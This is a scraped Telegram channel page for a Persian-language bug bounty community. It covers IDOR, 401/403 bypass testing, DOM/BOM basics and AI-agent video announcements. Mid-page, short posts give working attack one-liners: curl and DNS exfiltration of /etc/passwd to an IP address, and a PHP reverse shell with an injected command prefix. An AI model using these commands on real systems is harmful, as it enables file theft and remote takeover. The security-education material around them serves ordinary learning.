Eclipse
Статистика🩸 WE RISE FROM THE ASHES 🩸 > The Sun has fallen. 🌑 > A new era begins. 🔥 A Cyber Security Community for: 🕵️ Bug Bounty 💻 Ethical Hacking 🔍 Security Research ⚔️ Learn • Hunt • Evolve
- Последний пост
- 13 авг.
- Последнее чтение
- 12 авг.
- Постов за неделю
- 9
- Всего постов
- 24
- Тип
- открытый
- Язык
- английский
- В каталоге с
- 12 авг.
- 1/24сутки в ленте
- 26
- 1/48двое суток
- 29
- 1/72трое суток
- 32
Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.
Посты
без подписи
без подписи
без подписи
без подписи
💀🌑 [ ECLIPSE IS HERE ] 🌑💀 ⚠️ SYSTEM WARNING The Sun is fading... The shadow is taking over. 🌑 ☀️ TOTAL SOLAR ECLIPSE — 12 AUG 2026 🩸 The light disappears. 🌑 The darkness awakens. ⛓️ The world falls silent. From the ashes, we are born. 🔥 Through darkness, we ascend. 🩸 We were chosen... Not to follow the light, but to become the hand of God. 👁 ⚔️ WE ARE THE GOD HAND. The eclipse is not the end. It is our destiny. Trust no light. Embrace the Eclipse. 🌑
🧩 IDOR — Insecure Direct Object References ━━━━━━━━━━━━━━━━━━━━ یه باگ ساده اما خطرناک. جایی که برنامه بهت اجازه میده با تغییر یه پارامتر، به اطلاعات دیگران دسترسی پیدا کنی. مثال: /profile?id=1001 ➡️ پروفایل خودت /profile?id=1002 ➡️ پروفایل یکی دیگه 🫣 ━━━━━━━━━━━━━━━━━━━━ 🎯 چرا خطرناکه؟ چون دسترسی به منابع، فقط بر اساس ورودی کاربر چک میشه. نه بر اساس نقش، نه سطح دسترسی، نه هویت واقعی. 🔓 فقط یه عدد رو تغییر دادی و وارد شدی. ━━━━━━━━━━━━━━━━━━━━ 🛡 چطور تستش کنی؟ ✅ تغییر ID در URL (?id=, ?user=, ?file=) ✅ تغییر پارامترهای POST ✅ تغییر UUID یا توکنهای قابل حدس ✅ تغییر مسیرهای API مثل /api/order/1001 → /api/order/1002 ━━━━━━━━━━━━━━━━━━━━ ⚠️ همیشه به فکر Access Control باش! ابزارت فقط یه مرورگر و یه ذهن کنجکاوه. ━━━━━━━━━━━━━━━━━━━━ #BugBounty #IDOR #WebSecurity #AccessControl #Hunt #Hack #EthicalHacking #InfoSec #CyberSecurity #Pentesting #Eclipse 🌑 @eclipse0x00
https://freedium-mirror.cfd/https://medium.com/@Aacle/how-to-build-a-recon-workflow-that-actually-finds-bugs-not-just-data-12167d2d93e8
WHO WANTS TO BE KING?
🔍 403 Forbidden vs 401 Unauthorized خیلیها این دو رو یکی میدونن، اما تفاوتشون چیه؟ 🛑 401 Unauthorized یعنی هويت نداری. احراز هویت نشدی. بهت میگه: "تو کی هستی؟" 🚫 403 Forbidden یعنی هويت داری، اما دسترسی نداری. بهت میگه: "میدونم کی هستی، ولی نمیذارم بری تو." ━━━━━━━━━━━━━━━━━━━━ 💡 چرا تو Bug Bounty مهمه؟ 🔓 401 ✅ میتونی با دستکاری هدرها (Authorization, JWT, Cookie) دور بزنی ✅ بروتفورس روی Credentials ✅ تستکردن نقشهای مختلف کاربری 🔓 403 ✅ میتونی با تغییر هدرها یا پارامترها بایپس کنی (مثل X-Forwarded-For, Host) ✅ تست IDOR و دسترسی به منابع دیگران ✅ بروتفورس روی مسیرها و فایلهای مخفی ✅ تغییر Method (GET → POST → PUT) یا تغییر Content-Type ⚠️ هیچوقت فقط به Status Code اکتفا نکن! هر دو ممکنه با تغییر نقش کاربر یا سطح دسترسی دور زده بشن. ━━━━━━━━━━━━━━━━━━━━ #BugBounty #WebSecurity #Error403 #Error401 #Hunt #Hack #EthicalHacking #InfoSec #Security #CyberSecurity #Bypass #IDOR #Eclipse 🌑 @eclipse0x00
https://open.spotify.com/track/6QCZF4g0eAwuI3DLspAREX?si=5kVIe_ivSBK2HSqX-s7tOQ&utm_source=copy-link&sci=spotify%3Acard-config%3A4VLFfCZnea0SbxRUBa7Js7
سلام رفقا امید وارم حالتون عالی باشه ویدیو جدید در مورد ai agent ها منتشر شد تو این ویدیو رفتیم سراغ مفاهیم پایهای و در عین حال مهم دنیای هوش مصنوعی و باهم بررسیشون کردیم: ✅اولین بحث LLM چیه و چطور کار میکنه ✅ فرق بین یه چتباکس ساده و یه Agent واقعی ✅ ویژگیهای کلیدی یک Agent: Loop، Tool Use، Memory، Skills و بیشتر ✅ روشهای مختلف تهیهی LLM برای Agent (لوکال، رایگان، اشتراک یا API) ✅ تو پارت بعدی میریم سراغ نصب Hermes و شروع کار عملی https://www.youtube.com/watch?v=N6RDAReH2QI
File Send With Curl: curl -F "file=@/etc/passwd" http://192.168.115.154/ curl -T /etc/passwd http://192.168.115.154/
File Send With DNS: dig @192.168.115.154 $(cat passwd | base64 | tr -d '\n' | fold -w50 | head -n1).test.com
Reverse Shell on PHP: 0;php -r '$sock=fsockopen("192.168.67.23",9001);exec("sh <&3 >&3 2>&3");'
Author: zarvan Language: Persian Telegram channel: @web_articles
Author: zarvan Language: Persian Telegram channel: @web_articles
درود دوستان چند وقتی بود میخواستم این کتاب رو آماده کنم. اما وقت نمیشد تصمیم گرفتم کم کم پیش برم. سعی میکنم هر چند روز یک ( شایدم زودتر) بار یه فصلش رو آماده کنم.
دیدیم که ایجنت دقیقا چیه و وقتشه که ایجنت خودمون رو داشته باشیم! مستقل از بحث فنی اگر امکانش رو دارین این رو راه بندازین و شاید در زندگی روزمره هم براتون مفید باشه (: توی این ویدئو با استفاده از مدل های زبانی یکی از ایجنت های مرسوم رو راه می ندازیم ولی حینش کلی هم گپ و گفت در مورد مفاهیم می زنیم تا دقیقا بفهمیم داریم چیکار می کنیم. https://youtu.be/mGMRzB-c8NA #هوش_مصنوعی #ویدئو
https://open.spotify.com/track/6BnxBf4umXVTwbEOvDpHXO?si=GUYsFNMtT2iM3lH5xllXIQ&utm_source=native-share-menu
🧠 DOM & BOM — JavaScript و مرورگر ━━━━━━━━━━━━━━━━━━━━ 🌐 DOM — Document Object Model DOM یک API هست که فایلهای HTML / XML رو به شکل یک مدل شیگرا در اختیار JavaScript قرار میده تا JS بتونه با ساختار و محتوای صفحه تعامل داشته باشه. ⚠️ DOM ≠ HTML DOM = نتیجهی تفسیر HTML توسط مرورگر JavaScript برای دستکاری ساختار HTML در صفحه، از DOM استفاده میکنه. // DOM document.getElementById("x") ━━━━━━━━━━━━━━━━━━━━ 🌍 BOM — Browser Object Model BOM یک API برای تعامل JavaScript با محیط مرورگر هست و اطلاعات و قابلیتهای مربوط به مرورگر رو به شکل یک مدل شیگرا در اختیار JS قرار میده. // BOM location.href = "https://example.com" ━━━━━━━━━━━━━━━━━━━━ 🧩 DOM vs BOM 🌐 DOM → محتوا و ساختار صفحه 🌍 BOM → خود مرورگر و رفتارهاش ━━━━━━━━━━━━━━━━━━━━ 💡 نکته مهم DOM خودش HTML رو تفسیر نمیکنه. 🔹 تفسیر HTML → وظیفهی مرورگر 🔹 نتیجهی این تفسیر → DOM ━━━━━━━━━━━━━━━━━━━━ 🌑 @eclipse0x00